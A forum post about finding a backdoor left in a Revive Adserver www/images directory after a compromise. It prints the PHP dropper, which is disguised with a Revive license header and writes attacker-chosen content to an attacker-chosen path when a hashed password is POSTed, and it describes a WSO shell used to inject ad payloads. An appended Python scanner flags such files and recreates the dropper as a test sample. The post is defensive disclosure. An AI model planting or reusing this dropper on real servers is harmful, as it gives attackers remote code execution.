Thierry

Backdoor left by hackers after previous 4.x install has been hijacked...


My previous 4.x install got compromised, some of my users were complaining about malware alerts and/or unwanted advertising (it was not all the time nor on all platforms, making the issue difficult to pinpoint).

I thought cleaning the Revive DB and upgrading my Revive install would be enough to secure my site but sadly no, PREPEND payloads kept being added from time to time despite running the latest version of Revive.

It took some hunting but I eventually discovered the hacker left a tiny PHP file in my Revive www/images directory. As I'm keeping that directory during upgrades, the security hole remained.

The file was simple:

----

<?php
/*
+---------------------------------------------------------------------------+
| Revive Adserver                                                           |
| http://www.revive-adserver.com |
|                                                                           |
| Copyright: See the COPYRIGHT.txt file.                                    |
| License: GPLv2 or later, see the LICENSE.txt file.                        |
+---------------------------------------------------------------------------+
*/
// Dropper: if the POSTed "password" matches the hard-coded MD5, write
// attacker-supplied contents to an attacker-supplied path (errors suppressed with @).
if(isset($_POST['adSelect']) && md5($_POST['adSelect']) == '***MD5HASH***') {
    @file_put_contents($_POST['banner_path'], $_POST['banner_contents']);
}

----

This allowed the hacker to load and execute any kind of file/script on my server!!!!

Lately he/she was uploading a "1.php" file (containing, as I found out, a WSO shell) which he/she would connect to, in order to load the PREPEND payload into my Revive DB... He/she would use a different IP to create the 1.php and connect to it (trying to hide their trace). The file would be erased once he/she had done their "job".

The process looks fairly manual.

Of course the hacker may well have left other backdoors outside of my Revive install 😞 😞 😞 This makes it impossible to guarantee all issues are resolved after an upgrade (maybe a quick check for PREPEND payloads and/or PHP files in the www/images directory could offer an alert that something is fishy...).

I would strongly recommend anyone who's had a 4.x install compromised to hunt for such files.

Cheers,

T.
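One way to implement the quick check suggested above for PHP files in www/images, as an added example that is not part of the original post or of Revive Adserver: it walks a directory, flags PHP extensions, PHP open tags inside files that claim to be images, and the request-parameter-to-file_put_contents pattern of the dropper shown in the post. The directory layout and sample files it writes are constructed for the demonstration; the extension list is an assumption to match against your server's handler configuration.

```python
import re
import tempfile
from pathlib import Path

# Extensions a PHP-enabled web server will typically execute (assumption: match your server config).
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}
PHP_TAG = re.compile(rb"<\?php|<\?=")
# The pattern of the dropper above: request-controlled content written to a request-controlled path.
WRITE_FROM_REQUEST = re.compile(
    rb"file_put_contents\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.IGNORECASE)


def scan_images_dir(root):
    """Return sorted (relative_path, reason) pairs for files that do not belong in an images tree."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        with path.open("rb") as fh:
            head = fh.read(65536)  # markers sit near the top of a script; avoid slurping big images
        if path.suffix.lower() in PHP_EXTENSIONS:
            findings.append((rel, "php extension"))
        if PHP_TAG.search(head):
            findings.append((rel, "php open tag in content"))
        if WRITE_FROM_REQUEST.search(head):
            findings.append((rel, "file_put_contents from request parameter"))
    return findings


def build_sample_dir(root):
    """Write constructed sample files: a real-looking PNG, a JPEG with PHP inside, and a dropper."""
    root = Path(root)
    (root / "sub").mkdir(parents=True, exist_ok=True)
    (root / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 64)
    (root / "sub" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>")
    (root / "sub" / "cache.php").write_bytes(  # same shape as the dropper in the post, hash placeholder
        b"<?php\nif(isset($_POST['adSelect']) && md5($_POST['adSelect']) == '***MD5HASH***') {\n"
        b"@file_put_contents($_POST['banner_path'], $_POST['banner_contents']);\n}\n")


def demo():
    """Build the constructed sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_dir(tmp)
        return scan_images_dir(tmp)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"ALERT {rel}: {reason}")
```

Run it against the real directory with `scan_images_dir("/path/to/www/images")`; any finding at all is worth a look, since that tree should contain nothing a PHP handler would execute.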
